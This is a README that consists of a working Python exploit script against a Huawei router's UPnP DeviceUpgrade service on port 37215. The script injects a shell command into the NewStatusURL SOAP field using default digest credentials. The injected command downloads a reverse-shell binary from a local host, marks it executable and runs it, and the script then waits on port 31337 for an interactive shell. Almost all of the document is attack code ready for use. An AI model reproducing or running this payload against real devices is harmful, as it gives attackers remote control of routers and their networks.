README.md
Rendering markdown...
#!/usr/bin/python3
import requests
from requests.auth import HTTPDigestAuth
from pwn import *
from threading import Thread
cmd = ';wget http://192.168.115.129/reverse_shell;chmod 777 reverse_shell;./reverse_shell;' #download file, authorized and execute
assert(len(cmd) < 255)
data = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>" + cmd + "</NewStatusURL>\n<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
url = "http://192.168.115.130:37215/ctrlt/DeviceUpgrade_1" #the router ip and port
def attack():
try:
requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=data)
except Exception as e:
print(e)
thread = Thread(target=attack)
thread.start()
io = listen(31337)
io.wait_for_connection()
io.interactive()
thread.join()